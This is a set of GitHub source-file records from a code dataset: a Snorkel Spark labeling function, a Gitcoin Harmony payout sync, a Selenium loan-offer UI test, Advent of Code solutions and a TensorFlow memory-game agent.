ANR\n self.parsed = self.bmap.settings.ANR.get()\n self.root.ids['ANRMode'].text = self.parsed['anr_mode'].name\n for mode in self.parsed['supported_modes']:\n modebtn = ToggleButton(text=mode.name, group='ANRMode', on_press=self.setANR)\n self.root.ids['ANRModes'].add_widget(modebtn)\n\n return self.root\n\nBoozeConnect().run()\n","repo_name":"prototux/booze-connect","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"22661330169","text":"from snorkel.preprocess.nlp import SpacyPreprocessor\nfrom snorkel.preprocess.spark import make_spark_preprocessor\n\nfrom .nlp import (\n BaseNLPLabelingFunction,\n SpacyPreprocessorParameters,\n base_nlp_labeling_function,\n)\n\n\nclass SparkNLPLabelingFunction(BaseNLPLabelingFunction):\n r\"\"\"Special labeling function type for SpaCy-based LFs running on Spark.\n\n This class is a Spark-compatible version of ``NLPLabelingFunction``.\n See ``NLPLabelingFunction`` for details.\n\n Parameters\n ----------\n name\n Name of the LF\n f\n Function that implements the core LF logic\n resources\n Labeling resources passed in to ``f`` via ``kwargs``\n pre\n Preprocessors to run before SpacyPreprocessor is executed\n text_field\n Name of data point text field to input\n doc_field\n Name of data point field to output parsed document to\n language\n SpaCy model to load\n See https://spacy.io/usage/models#usage\n disable\n List of pipeline components to disable\n See https://spacy.io/usage/processing-pipelines#disabling\n memoize\n Memoize preprocessor outputs?\n memoize_key\n Hashing function to handle the memoization (default to snorkel.map.core.get_hashable)\n gpu\n Prefer Spacy GPU processing?\n\n Raises\n ------\n ValueError\n Calling incorrectly defined preprocessors\n\n Attributes\n ----------\n name\n See above\n \"\"\"\n\n @classmethod\n def _create_preprocessor(\n cls, parameters: SpacyPreprocessorParameters\n ) -> SpacyPreprocessor:\n preprocessor = 
SpacyPreprocessor(**parameters._asdict())\n make_spark_preprocessor(preprocessor)\n return preprocessor\n\n\nclass spark_nlp_labeling_function(base_nlp_labeling_function):\n \"\"\"Decorator to define a SparkNLPLabelingFunction object from a function.\n\n Parameters\n ----------\n name\n Name of the LF\n resources\n Labeling resources passed in to ``f`` via ``kwargs``\n pre\n Preprocessors to run before SpacyPreprocessor is executed\n text_field\n Name of data point text field to input\n doc_field\n Name of data point field to output parsed document to\n language\n SpaCy model to load\n See https://spacy.io/usage/models#usage\n disable\n List of pipeline components to disable\n See https://spacy.io/usage/processing-pipelines#disabling\n memoize\n Memoize preprocessor outputs?\n memoize_key\n Hashing function to handle the memoization (default to snorkel.map.core.get_hashable)\n\n Example\n -------\n >>> @spark_nlp_labeling_function()\n ... def has_person_mention(x):\n ... person_ents = [ent for ent in x.doc.ents if ent.label_ == \"PERSON\"]\n ... return 0 if len(person_ents) > 0 else -1\n >>> has_person_mention\n SparkNLPLabelingFunction has_person_mention, Preprocessors: [SpacyPreprocessor...]\n\n >>> from pyspark.sql import Row\n >>> x = Row(text=\"The movie was good.\")\n >>> has_person_mention(x)\n -1\n \"\"\"\n\n _lf_cls = SparkNLPLabelingFunction\n","repo_name":"snorkel-team/snorkel","sub_path":"snorkel/labeling/lf/nlp_spark.py","file_name":"nlp_spark.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":5598,"dataset":"github-code","pt":"38"} +{"seq_id":"6716904085","text":"import json\n\nfrom django.conf import settings\nfrom django.utils import timezone\n\nimport requests\nfrom dashboard.sync.helpers import record_payout_activity, txn_already_used\n\n\ndef find_txn_on_harmony_explorer(fulfillment):\n token_name = fulfillment.token_name\n\n funderAddress = fulfillment.bounty.bounty_owner_address\n amount = fulfillment.payout_amount\n payeeAddress = fulfillment.fulfiller_address\n\n if token_name != 'ONE':\n return None\n\n\n url = f'https://explorer.hmny.io:8888/address?id={payeeAddress}&pageIndex=0&pageSize=20'\n\n\n response = requests.get(url).json()\n if (\n response and\n 'address' in response and\n 'shardData' in response['address']\n ):\n for shard in response['address']['shardData']:\n\n for tx in shard['txs']:\n if (\n tx['from'] == funderAddress.lower() and\n tx['to'] == payeeAddress.lower() and\n tx['value'] == float(amount) * 10 ** 18 and\n not txn_already_used(tx['hash'], token_name)\n ):\n return tx\n return None\n\n\ndef get_harmony_txn_status(fulfillment):\n\n txnid = fulfillment.payout_tx_id\n token_name = fulfillment.token_name\n funderAddress = fulfillment.funder_address\n amount = fulfillment.payout_amount\n payeeAddress = fulfillment.fulfiller_address\n\n if token_name != 'ONE':\n return None\n\n if not txnid or txnid == \"0x0\":\n return None\n\n url = f'https://explorer.hmny.io:8888/tx?id={txnid}'\n\n\n response = requests.get(url).json()\n if (response and 'tx' in response):\n tx = response['tx']\n\n if 'err' in tx:\n # txn hasn't been published to chain yet\n return None\n\n if (\n tx['from'] == funderAddress.lower() and\n tx['to'] == payeeAddress.lower() and\n tx['value']== float(amount) * 10 ** 18 and\n not txn_already_used(tx['hash'], token_name)\n ):\n if tx['status'] == 'SUCCESS':\n return 'success'\n\n return None\n\n\ndef sync_harmony_payout(fulfillment):\n if not fulfillment.payout_tx_id or 
fulfillment.payout_tx_id == \"0x0\":\n txn = find_txn_on_harmony_explorer(fulfillment)\n if txn:\n fulfillment.payout_tx_id = txn['hash']\n fulfillment.save()\n\n if fulfillment.payout_tx_id and fulfillment.payout_tx_id != \"0x0\":\n txn_status = get_harmony_txn_status(fulfillment)\n\n if txn_status == 'success':\n fulfillment.payout_status = 'done'\n fulfillment.accepted_on = timezone.now()\n fulfillment.accepted = True\n record_payout_activity(fulfillment)\n\n elif txn_status == 'expired':\n fulfillment.payout_status = 'expired'\n\n fulfillment.save()\n","repo_name":"gitcoinco/web","sub_path":"app/dashboard/sync/harmony.py","file_name":"harmony.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1747,"dataset":"github-code","pt":"38"} +{"seq_id":"40595468770","text":"# Testcase: Verify via the UI that as a borrower - you are seeing loan offers, upon filling the required form fields with valid inputs.\n# Input URL: https://www.credify.tech/phone/nonDMFunnel\n# Input URL: https://www.credify.tech/portal/login\n\nimport pytest\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n# driver= webdriver.Firefox(executable_path=\"C:\\\\Users\\\\mbehera\\\\Desktop\\\\PROJECTS\\\\Automation\\\\Browser\\\\geckodriver.exe\")\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\nurl = \"https://www.credify.tech/phone/nonDMFunnel\"\nportalurl = \"https://www.credify.tech/portal/login\"\n\nclass TestLoanOffer():\n\n def test_VerifyLoanOffer(self):\n\n #Step1: Navigate to https://www.credify.tech/phone/nonDMFunnel\n driver.get(url)\n driver.maximize_window()\n\n #Step2: a. Enter loan amount as 2,000 and select any purpose\n #b. Click \"Check your Rate\"\n element_LoanAmount= driver.find_element_by_name(\"desiredAmount\")\n element_LoanAmount.click()\n element_LoanAmount.send_keys(2000)\n element_LoanPurpose = driver.find_element_by_css_selector(\"#root > div > main > div > div > div > div > div.col-xs-12.col-md-5 > div.section--sm.row > form > div > div > div:nth-child(2) > div > select\")\n element_LoanPurpose.send_keys('d') # for 'Debt Consolidation'\n element_button= driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div/div/div/div[2]/div[2]/form/div/div/div[3]/button\")\n element_button.submit()\n\n #Step3: Enter basic info in the page.\n firstname= driver.find_element_by_name(\"borrowerFirstName\")\n firstname.send_keys(\"Tom\")\n lastname = driver.find_element_by_name(\"borrowerLastName\")\n lastname.send_keys(\"sandy\")\n address = driver.find_element_by_name(\"borrowerStreet\")\n address.send_keys(\"1111 Grundy lane, San Bruno, CA, USA\")\n city= driver.find_element_by_name(\"borrowerCity\")\n city.send_keys(\"San Bruno\")\n state = driver.find_element_by_name(\"borrowerState\")\n state.send_keys(\"California\")\n zipcode = driver.find_element_by_name(\"borrowerZipCode\")\n zipcode.send_keys(94010)\n DOB = driver.find_element_by_name(\"borrowerDateOfBirth\")\n DOB.send_keys(\"01/01/1985\")\n button_continue = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div[2]/div[1]/div/div/form/div[2]/button\")\n button_continue.submit()\n income=driver.find_element_by_name(\"borrowerIncome\")\n income.send_keys(125000)\n additionaliIncome = driver.find_element_by_name(\"borrowerAdditionalIncome\")\n additionaliIncome.send_keys(6000)\n button_continue2 = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div[2]/div[1]/div/div/form/div[2]/button\")\n 
button_continue2.submit()\n email= driver.find_element_by_name(\"username\")\n email.send_keys(\"hello123@upgrade-challnge.com\")\n pw= driver.find_element_by_name(\"password\")\n pw.send_keys(\"Hello@123\")\n checkbox= driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div[2]/div[1]/div/div/form/div[2]/div/label/div[1]\")\n checkbox.click()\n checkRate_button= driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div[2]/div[1]/div/div/form/div[2]/div/label/div[1]\")\n checkRate_button.submit()\n\n #Step4: From the /offer-page, store the Loan Amount, Monthly Payment, Term, Interest Rate and APR from the default offer on top of the page.\n #a. Click on \"Sign Out\" from the Menu option in the top right corner\n driver.implicitly_wait(5)\n LoanAmount = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[1]/div[2]/span[2]\")\n MonthlyPayment = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[1]/div/div/span\").text\n Term = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[1]\").text\n InterestRate = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[2]\").text\n APR = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[3]/div[1]\").text\n LoanAmountfinal = LoanAmount.text\n print(LoanAmountfinal)\n print(MonthlyPayment)\n print(Term)\n print(InterestRate)\n print(APR)\n menu = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/header/div/label\")\n menu.click()\n signout = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/header/div/nav/ul/li[2]/a\")\n signout.click()\n #driver.close()\n\n #Step5: Now navigate to https://www.credify.tech/portal/login\n # a. Enter the previously entered email and password\n # b. Click \"Sign In to your account\"\n driver.get(portalurl)\n portal_login = driver.find_element_by_name(\"username\")\n portal_login.send_keys(\"hello123@upgrade-challnge.com\")\n portal_pw = driver.find_element_by_name(\"password\")\n portal_pw.send_keys(\"Hello@123\")\n signIn = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div/div/div/div/form/button\")\n signIn.submit()\n driver.implicitly_wait(5)\n\n #Step6: Make sure you are on /offer-page\n # a. 
Validate that Loan Amount, APR, Loan Term and Monthly Payment match the info stored\n        # previously\n        header = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div/h2\")\n        pageHeader = header.text\n        amount = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[1]/div[2]/span[2]\").text\n        offeredmonthypayment = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[1]/div/div/span\").text\n        offered_term = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[1]\").text\n        offered_InterestRate = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[2]\").text\n        offered_APR = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[3]/div\").text\n        if pageHeader == \"You qualify for a discount on your debt payoff loan!\":\n            assert amount == LoanAmountfinal\n            print(\"The Loan amount matches and it is \" + str(LoanAmountfinal))\n            assert offeredmonthypayment == MonthlyPayment\n            print(\"Monthly payment matches and it's \" + str(MonthlyPayment))\n            assert offered_term == Term\n            print(\"Term matches and it's \" + Term)\n            assert offered_InterestRate == InterestRate\n            print(\"Interest Rate matches and it's \" + InterestRate)\n            assert offered_APR == APR\n            print(\"APR matches and it's \" + APR)\n        else:\n            print(\"You are not on the offer-page, please check\")\n\n\n\n# a = TestLoanOffer()\n# a.test_VerifyLoanOffer()\n\n\n\n\n\n\n","repo_name":"muktabehera/Selenium_WebAutomation","sub_path":"Tests/test_LoanOffers.py","file_name":"test_LoanOffers.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25438922014","text":"INPUT_FILE = \"input\"\n\nfrom more_itertools import chunked\n\nimport numpy as np\n\n\ndef get_input():\n    with open(INPUT_FILE) as f:\n        calls = [int(x) for x in f.readline().strip().split(\",\")]\n\n        remaining_lines = [\n            [int(x) for x in line.strip().split()]\n            for line in f.readlines()\n            if line != \"\\n\"\n        ]\n\n        boards = list(chunked(remaining_lines, 5))\n\n        return calls, boards\n\n\ndef update_board(board, num):\n    for (y, row) in enumerate(board):\n        for (x, column) in enumerate(row):\n            if column == num:\n                board[y][x] = \"X\"\n                return board\n\n    return board\n\n\ndef board_wins(board):\n    def board_has_full_row(b):\n        for row in b:\n            if len([x for x in row if x != \"X\"]) == 0:\n                return True\n\n    # Check horizontal\n    if board_has_full_row(board):\n        return True\n\n    # Check vertical\n    if board_has_full_row(np.transpose(board)):\n        return True\n\n    return False\n\n\ndef get_score(board):\n    return sum(x for row in board for x in row if x != \"X\")\n\n\ndef pt_one():\n    call_order, boards = get_input()\n\n    for n in call_order:\n        for (i, board) in enumerate(boards):\n            boards[i] = update_board(board, n)\n\n            if board_wins(board):\n                return get_score(board) * n\n\n\ndef pt_two():\n    call_order, boards = get_input()\n    marked_boards = [[False, board] for board in boards]\n\n    for n in call_order:\n        for (i, board) in enumerate(marked_boards):\n            if board[0]:\n                continue\n\n            marked_boards[i][1] = update_board(board[1], n)\n\n            if board_wins(board[1]):\n                board[0] = True\n\n                # If all boards have won, this is the last board\n                if len([b for b in marked_boards if not b[0]]) == 0:\n                    
return get_score(board[1]) * n\n\n\nif __name__ == \"__main__\":\n print(pt_one())\n print(pt_two())\n","repo_name":"advmtue/advent-of-code","sub_path":"2021/4/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"241891167","text":"import sys\nimport itertools\nfrom queue import Queue\nfrom threading import Thread\nimport pdb\nimport random\n\ndef _calc_opcode_args(opcode, numbers, i, relative_base):\n modes = list()\n args = list()\n newOpcode = opcode % 100\n modes.append(int(int((opcode % 1000)) / 100))\n modes.append(int(int((opcode % 10000)) / 1000))\n modes.append(int(int((opcode % 100000)) / 10000))\n opcode = newOpcode\n\n j = 1\n for mode in modes:\n if mode == 1:\n args.append(i + j)\n elif mode == 0:\n args.append(numbers[i + j])\n else:\n args.append(relative_base + numbers[i + j])\n j += 1\n return (opcode, args)\n\n\ndef run_computer(numbers, in_queue, out_queue, num):\n i = 0\n relative_base = 0\n while i < len(numbers):\n opcode, args = _calc_opcode_args(numbers[i], numbers, i, relative_base)\n def number1():\n return args[0]\n def number2():\n return args[1]\n def number3():\n return args[2]\n\n if opcode == 99:\n break\n if opcode == 1 or opcode == 2:\n if (opcode == 1):\n numbers[number3()] = numbers[number1()] + numbers[number2()]\n else:\n numbers[number3()] = numbers[number1()] * numbers[number2()]\n i += 4\n if opcode == 3:\n inputValue = in_queue.get()\n if inputValue == 99999:\n break\n numbers[number1()] = inputValue\n i += 2\n if opcode == 4:\n out_queue.put(numbers[number1()])\n i += 2\n if opcode == 5:\n if numbers[number1()] != 0:\n i = numbers[number2()]\n else:\n i += 3\n if opcode == 6:\n if numbers[number1()] == 0:\n i = numbers[number2()]\n else:\n i += 3\n if opcode == 7:\n if numbers[number1()] < numbers[number2()]:\n numbers[number3()] = 1\n else:\n numbers[number3()] = 0\n i += 4\n if opcode == 8:\n if numbers[number1()] == numbers[number2()]:\n numbers[number3()] = 1\n else:\n numbers[number3()] = 0\n i += 4\n if opcode == 9:\n relative_base += numbers[number1()]\n i += 2\n\ndef run_computer_file(filename):\n file = open(filename)\n lines = [line.rstrip('\\n') for line in file]\n file.close()\n numbers = list(map(int, lines[0].split(\",\")))\n numbers.extend([0] * 10000)\n numbers[0] = 2\n\n inQueue = Queue()\n outQueue = Queue()\n t = Thread(target = run_computer , args = (numbers.copy(), inQueue, outQueue, 0))\n t.start()\n\n scaffolds = set()\n spaces = set()\n i = 0\n j = 0\n maxi = 0\n maxj = 0\n startPoint = None\n # 76 = L\n # 82 = R\n # 56 = 8\n ORDER = [66, 44, 67, 44, 66, 44, 67, 44, 65, 44, 67, 44, 66, 44, 65, 44, 67, 44, 65, 10]\n A = [82, 44, 49, 48, 44, 76, 44, 56, 44, 76, 44, 52, 44, 82, 44, 49, 48, 10]\n B = [76, 44, 49, 50, 44, 76, 44, 56, 44, 82, 44, 49, 48, 44, 82, 44, 49, 48, 10]\n C = [76, 44, 54, 44, 76, 44, 52, 44, 76, 44, 49, 50, 10]\n for a in ORDER:\n inQueue.put(a)\n for a in A:\n inQueue.put(a)\n for a in B:\n inQueue.put(a)\n for a in C:\n inQueue.put(a)\n\n\n inQueue.put(110) # n\n #inQueue.put(121) # y\n inQueue.put(10)\n direction = 0 # 0 = UP, 1 = RIGHT, 2 = DOWN, 3 = LEFT\n while t.is_alive() or not outQueue.empty():\n out = outQueue.get()\n if out == 35:\n scaffolds.add((j, i))\n print('#', end='')\n elif out == 46:\n spaces.add((j, i))\n print('.', end='')\n elif out == 60 or out == 62 or out == 94 or out == 118:\n startPoint = (j, i)\n scaffolds.add((j, i))\n if out == 60:\n 
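The bingo solution's vertical-win check simply reuses the row check on the transposed board. A tiny standalone check of that trick (note that `np.transpose` coerces the mixed int/str board to strings, which does not affect the `"X"` comparison):

```python
import numpy as np

# A 3x3 board with its middle column fully marked: no row wins directly,
# but the transpose turns that column into a winning row.
board = [[1, "X", 3], [4, "X", 6], [7, "X", 9]]
has_full_row = lambda b: any(all(x == "X" for x in row) for row in b)
assert not has_full_row(board)
assert has_full_row(np.transpose(board))
```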
direction = 3\n print('<', end='')\n elif out == 62:\n direction = 1\n print('>', end='')\n elif out == 118:\n direction = 2\n print('v', end='')\n else:\n print('^', end='')\n elif out == 10:\n j = 0\n i += 1\n print()\n if i > maxi:\n maxi = i\n continue\n elif out < 150:\n print(str(chr(out)), end='')\n else:\n print(out)\n j += 1\n if j > maxj:\n maxj = j\n\n print()\n intersections = set()\n for scaffold in scaffolds:\n numNeighbours = 0\n for neighbour in ((scaffold[0], scaffold[1]+1), (scaffold[0], scaffold[1]-1), (scaffold[0]+1, scaffold[1]), (scaffold[0]-1, scaffold[1])):\n if neighbour in scaffolds:\n numNeighbours += 1\n if numNeighbours == 4:\n intersections.add(scaffold)\n\n currpoint = startPoint\n pointsToVisit = scaffolds.copy()\n pointsToVisit.remove(currpoint)\n intersectionsToVisit = intersections.copy()\n def left(point, direction):\n if direction == 0:\n return (point[0] - 1, point[1])\n if direction == 1:\n return (point[0], point[1] - 1)\n if direction == 2:\n return (point[0] + 1, point[1])\n if direction == 3:\n return (point[0], point[1] + 1)\n\n def right(point, direction):\n return left(point, (direction + 2) % 4)\n\n def forward(point, direction):\n return left(point, (direction + 1) % 4)\n\n def findPath(currpoint, direction, pointsToVisit, intersectionsToVisit):\n count = 0\n path = list()\n while len(pointsToVisit) > 0:\n if forward(currpoint, direction) in pointsToVisit:\n currpoint = forward(currpoint, direction)\n count += 1\n elif left(currpoint, direction) in pointsToVisit:\n currpoint = left(currpoint, direction)\n direction = (direction - 1) % 4\n if count > 0:\n path.append(count)\n count = 1\n path.append('L')\n elif right(currpoint, direction) in pointsToVisit:\n currpoint = right(currpoint, direction)\n direction = (direction + 1) % 4\n if count > 0:\n path.append(count)\n count = 1\n path.append('R')\n\n\n \n if currpoint in intersectionsToVisit:\n intersectionsToVisit.remove(currpoint)\n elif len(pointsToVisit) > 0:\n pointsToVisit.remove(currpoint)\n path.append(count)\n print(path)\n findPath(currpoint, direction, pointsToVisit, intersectionsToVisit)\n\nif __name__ == '__main__':\n output = run_computer_file('input')\n print(f'program output: {output}')\n","repo_name":"PatrikBillgren/AdventOfCode2019","sub_path":"17/2/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38704786071","text":"#!/usr/bin/env python3\n#\n# Team members:\n# Dominik Chodounský\n# Martin Lank\n# Juraj Kmec\n#\n# ReCodExIDs:\n# 882a1f6f-99a2-48df-aee6-1b62d6d0d2df\n# b503f10b-77cf-41be-a787-371a69cfa66a\n# 8c8b5f62-9f3e-4825-9966-185987537e3f\n\nimport argparse\nimport os\n\nos.environ.setdefault(\"TF_CPP_MIN_LOG_LEVEL\", \"2\") # Report only TF errors by default\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\n\nimport memory_game_environment\nimport wrappers\n\n# tf.config.run_functions_eagerly(True)\n# tf.data.experimental.enable_debug_mode()\n\nparser = argparse.ArgumentParser()\n# These arguments will be set appropriately by ReCodEx, even if you change them.\nparser.add_argument(\"--cards\", default=8, type=int, help=\"Number of cards in the memory game.\")\nparser.add_argument(\"--recodex\", default=False, action=\"store_true\", help=\"Running in ReCodEx\")\nparser.add_argument(\"--render_each\", default=0, type=int, help=\"Render some episodes.\")\nparser.add_argument(\"--seed\", default=None, type=int, help=\"Random 
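`_calc_opcode_args` in the intcode program above splits an instruction into a two-digit opcode and three parameter modes. The arithmetic is easiest to see on the classic example 1002 (a multiply whose second parameter is in immediate mode):

```python
opcode = 1002
instruction = opcode % 100            # low two digits: the operation (2 = multiply)
modes = [(opcode // 100) % 10,        # mode of parameter 1
         (opcode // 1000) % 10,       # mode of parameter 2
         (opcode // 10000) % 10]      # mode of parameter 3
assert (instruction, modes) == (2, [0, 1, 0])
```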
seed.\")\nparser.add_argument(\"--threads\", default=16, type=int, help=\"Maximum number of threads to use.\")\n# If you add more arguments, ReCodEx will keep them with your default values.\nparser.add_argument(\"--batch_size\", default=64, type=int, help=\"Number of episodes to train on.\")\nparser.add_argument(\"--evaluate_each\", default=1024, type=int, help=\"Evaluate each number of episodes.\")\nparser.add_argument(\"--evaluate_for\", default=100, type=int, help=\"Evaluate for number of episodes.\")\nparser.add_argument(\"--hidden_layer\", default=None, type=int, help=\"Hidden layer size; default 8*`cards`\")\nparser.add_argument(\"--memory_cells\", default=None, type=int, help=\"Number of memory cells; default 2*`cards`\")\nparser.add_argument(\"--memory_cell_size\", default=None, type=int, help=\"Memory cell size; default 3/2*`cards`\")\n\n\ndef masked_sparse_categorical_crossentropy(y_true, y_pred, mask):\n y_true = tf.boolean_mask(y_true, mask)\n y_pred = tf.boolean_mask(y_pred, mask)\n return tf.keras.losses.SparseCategoricalCrossentropy()(y_true, y_pred)\n\n\nclass Network:\n def __init__(self, env: wrappers.EvaluationEnv, args: argparse.Namespace) -> None:\n self.args = args\n self.env = env\n\n # Define the agent inputs: a memory and a state.\n memory = tf.keras.layers.Input(shape=(args.memory_cells, args.memory_cell_size), dtype=tf.float32)\n # memory = tf.keras.layers.Masking(mask_value=-1)(memory)\n state = tf.keras.layers.Input(shape=env.observation_space.shape, dtype=tf.int32)\n # state = tf.keras.layers.Masking(mask_value=-1)(state)\n\n # Encode the input state, which is a (card, observation) pair,\n # by representing each element as one-hot and concatenating them, resulting\n # in a vector of length `sum(env.observation_space.nvec)`.\n encoded_input = tf.keras.layers.Concatenate()(\n [tf.one_hot(state[:, i], dim) for i, dim in enumerate(env.observation_space.nvec)])\n\n # Generate a read key for memory read from the encoded input, by using\n # a ReLU hidden layer of size `args.hidden_layer` followed by a dense layer\n # with `args.memory_cell_size` units and `tanh` activation (to keep the memory\n # content in limited range).\n x = tf.keras.layers.Dense(args.hidden_layer, activation='relu')(encoded_input)\n read_key = tf.keras.layers.Dense(args.memory_cell_size, activation='tanh')(x)\n\n # Read the memory using the generated read key. Notably, compute cosine\n # similarity of the key and every memory row, apply softmax to generate\n # a weight distribution over the rows, and finally take a weighted average of\n # the memory rows.\n normalized_memory = tf.math.l2_normalize(memory, axis=-1)\n normalized_read_keys = tf.math.l2_normalize(read_key, axis=-1)\n matvec = tf.linalg.matvec(normalized_memory, normalized_read_keys)\n softmax = tf.nn.softmax(matvec, axis=-1)\n read_value = tf.linalg.matvec(memory, softmax, transpose_a=True)\n\n # Using concatenated encoded input and the read value, use a ReLU hidden\n # layer of size `args.hidden_layer` followed by a dense layer with\n # `env.action_space.n` units and `softmax` activation to produce a policy.\n policy = tf.keras.layers.Concatenate(axis=1)([encoded_input, read_value])\n policy = tf.keras.layers.Dense(args.hidden_layer, activation='relu')(policy)\n policy = tf.keras.layers.Dense(env.action_space.n, activation='softmax')(policy)\n\n # Perform memory write. 
For faster convergence, append directly\n # the `encoded_input` to the memory, i.e., add it as a first memory row, and drop\n # the last memory row to keep memory size constant.\n updated_memory = tf.concat([tf.expand_dims(encoded_input, 1), memory[:, :-1]], axis=1)\n updated_memory = tf.squeeze(updated_memory) # To avoid adding extra dimension when batch_size = 1\n\n # Create the agent\n self._agent = tf.keras.Model(inputs=[memory, state], outputs=[updated_memory, policy])\n self._agent.compile(optimizer=tf.optimizers.Adam(),\n loss=masked_sparse_categorical_crossentropy)\n\n def zero_memory(self):\n # Return an empty memory. It should be a TF tensor\n # with shape `[self.args.memory_cells, self.args.memory_cell_size]`.\n return tf.zeros(shape=[self.args.memory_cells, self.args.memory_cell_size])\n\n @tf.function\n def _train(self, states, targets, episode_lengths, max_length):\n # Given a batch of sequences of `states` (each being a (card, symbol) pair),\n # train the network to predict the required `targets`.\n #\n # Specifically, start with a batch of empty memories, and run the agent\n # sequentially as many times as necessary, using `targets` as gold labels.\n #\n # Note that the sequences can be of different length, so you need to pad them\n # to same length and then somehow indicate the length of the individual episodes\n # (one possibility is to add another parameter to `_train`).\n batch_size = len(states)\n memory = tf.stack([self.zero_memory() for _ in range(batch_size)])\n for step in range(max_length):\n state = states[:, step]\n target = targets[:, step]\n mask = step < episode_lengths\n with tf.GradientTape() as tape:\n memory, policy = self._agent([memory, state])\n loss = self._agent.loss(target, policy, mask)\n grads = tape.gradient(loss, self._agent.trainable_variables)\n self._agent.optimizer.apply_gradients(zip(grads, self._agent.trainable_weights))\n\n def train(self, episodes):\n # Given a list of episodes, prepare the arguments\n # of the self._train method, and execute it.\n # len(e) - 1 because the last action is None and not interesting for training.\n state_batches, action_batches, episode_lengths = [], [], [len(e) - 1 for e in episodes]\n max_len = max(episode_lengths)\n\n for e in episodes:\n states, actions = [], []\n for step in range(max_len):\n if step < len(e) - 1: # Last action is None.\n states.append(e[step][0])\n actions.append(e[step][1])\n else:\n states.append([-1, -1])\n actions.append(-1)\n state_batches.append(states)\n action_batches.append(actions)\n\n self._train(np.array(state_batches), np.array(action_batches), np.array(episode_lengths), max_len)\n\n @wrappers.typed_np_function(np.float32, np.int32)\n @wrappers.raw_tf_function(dynamic_dims=1)\n def predict(self, memory, state):\n return self._agent([memory, state])\n\n\ndef main(env, args):\n # Set random seeds and number of threads\n if args.seed is not None:\n tf.keras.utils.set_random_seed(args.seed)\n tf.config.threading.set_inter_op_parallelism_threads(args.threads)\n tf.config.threading.set_intra_op_parallelism_threads(args.threads)\n\n # Post-process arguments to default values if not overridden on the command line.\n if args.hidden_layer is None:\n args.hidden_layer = 8 * args.cards\n if args.memory_cells is None:\n args.memory_cells = 2 * args.cards\n if args.memory_cell_size is None:\n args.memory_cell_size = 3 * args.cards // 2\n assert sum(env.observation_space.nvec) == args.memory_cell_size\n\n # Construct the network\n network = Network(env, args)\n\n def 
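The memory write being described is a FIFO shift: the encoded input becomes row 0 and the oldest row falls off. The unbatched NumPy equivalent of the `tf.concat` line:

```python
import numpy as np

memory = np.zeros((4, 3))
new_row = np.array([1.0, 2.0, 3.0])
# Prepend the new row and drop the last one: memory size stays constant.
memory = np.concatenate([new_row[None, :], memory[:-1]], axis=0)
assert memory.shape == (4, 3) and (memory[0] == new_row).all()
```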
evaluate_episode(start_evaluation: bool = False, logging: bool = True) -> float:\n state, memory = env.reset(start_evaluation=start_evaluation, logging=logging)[0], network.zero_memory()\n rewards, done = 0, False\n while not done:\n # Find out which action to use\n memory, policy = network.predict([memory], [state])\n action = np.argmax(policy)\n state, reward, terminated, truncated, _ = env.step(action)\n done = terminated or truncated\n rewards += reward\n return rewards\n\n # Training\n training = True\n while training:\n # Generate required number of episodes\n for _ in range(args.evaluate_each // args.batch_size):\n episodes = []\n for _ in range(args.batch_size):\n episodes.append(env.expert_episode())\n\n # Train the network\n network.train(episodes)\n\n # Periodic evaluation\n returns = [evaluate_episode() for _ in range(args.evaluate_for)]\n if np.mean(returns) - 2 * np.std(returns) > 0:\n training = False\n\n # Final evaluation\n while True:\n evaluate_episode(start_evaluation=True)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args([] if \"__file__\" not in globals() else None)\n\n # Create the environment\n env = wrappers.EvaluationEnv(gym.make(\"MemoryGame-v0\", cards=args.cards), args.seed, args.render_each,\n evaluate_for=args.evaluate_for, report_each=args.evaluate_for)\n\n main(env, 